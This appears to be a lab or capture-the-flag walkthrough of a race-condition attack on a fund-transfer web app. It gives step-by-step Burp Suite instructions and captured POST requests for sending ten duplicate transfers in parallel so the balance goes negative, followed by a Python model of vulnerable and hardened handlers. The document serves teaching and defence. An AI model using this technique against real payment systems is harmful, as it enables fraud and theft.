This attack sends multiple identical requests to the application in parallel. The application then processes the requests simultaneously without proper synchronization, so each request passes the same check before any of them updates the state, resulting in unintended actions.
#view the application manually and identify attack vectors
root@oco:~$ BROWSER > {targetSite:port} > fund transfer application
#
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /transfer HTTP/1.1
Host: 10.10.68.92:5000
Referer: http://10.10.68.92:5000/dashboard
account_number=111&amount=500
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /transfer HTTP/1.1
Host: 10.10.68.92:5000
Referer: http://10.10.68.92:5000/dashboard
account_number=111&amount=500
#create 10 duplicate requests and group them into one tab group
BURP > Repeater > CTRL+R x10 > + > Create Tab Group
Group Name: {arbitrary}
Tabs in Group: all
* create 10 copies of the same request via CTRL+R
- the objective is to send all 10 duplicate requests in parallel
BURP > Repeater > Send Options > Send Group In Parallel (last-byte sync)
* Send Options is enabled via the 'down' arrow on the Send button
- send all 10 requests in parallel once ready
BURP > Repeater > Follow Redirection
Response
...
* ALT:
BURP > BROWSER > Refresh
- view the page source to get the flag
- the negative balance should be visible
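A minimal model of the race the steps above exploit, added here as an example (it is not the target application's code, which the page does not show): a check-then-act transfer handler hit by ten requests released at the same instant, the way Repeater's last-byte sync does, beside a hardened version that holds the row lock across both the check and the debit. The opening balance of 600, the 500 transfer amount matching the request above, and the 0.2 s handling window are constructed values.

```python
import threading
import time

WINDOW = 0.2  # constructed: time between the balance check and the debit (DB round trip)

class Account:
    def __init__(self, balance):
        self.balance = balance                  # the 'accounts' row the /transfer endpoint updates
        self._row_lock = threading.Lock()       # stands in for the database row lock

    def transfer_vulnerable(self, amount):
        # Check-then-act in two separate statements: SELECT, then UPDATE, no lock across them.
        if self.balance < amount:               # SELECT balance ... (every racer reads the same value)
            return False
        time.sleep(WINDOW)                      # all parallel requests are past the check by now
        with self._row_lock:                    # UPDATE ... SET balance = balance - amount
            self.balance -= amount
        return True

    def transfer_hardened(self, amount):
        # Check and debit in one critical section: one transaction holding the row lock
        # (SELECT ... FOR UPDATE), or a single conditional UPDATE ... WHERE balance >= amount.
        with self._row_lock:
            if self.balance < amount:
                return False
            time.sleep(WINDOW)
            self.balance -= amount
            return True

def run_race(transfer, opening_balance=600, amount=500, workers=10):
    """Fire `workers` identical transfers together; returns (final_balance, accepted_count)."""
    account = Account(opening_balance)
    results = []
    start = threading.Barrier(workers)          # release all threads at once (last-byte sync)

    def worker():
        start.wait()
        results.append(transfer(account, amount))

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return account.balance, sum(results)

if __name__ == "__main__":
    print("vulnerable:", run_race(Account.transfer_vulnerable))  # (-4400, 10): balance goes negative
    print("hardened:  ", run_race(Account.transfer_hardened))    # (100, 1): only one transfer accepted
```

The vulnerable handler accepts all ten transfers and ends at -4400, which is the negative balance the page source reveals; the hardened one accepts exactly one.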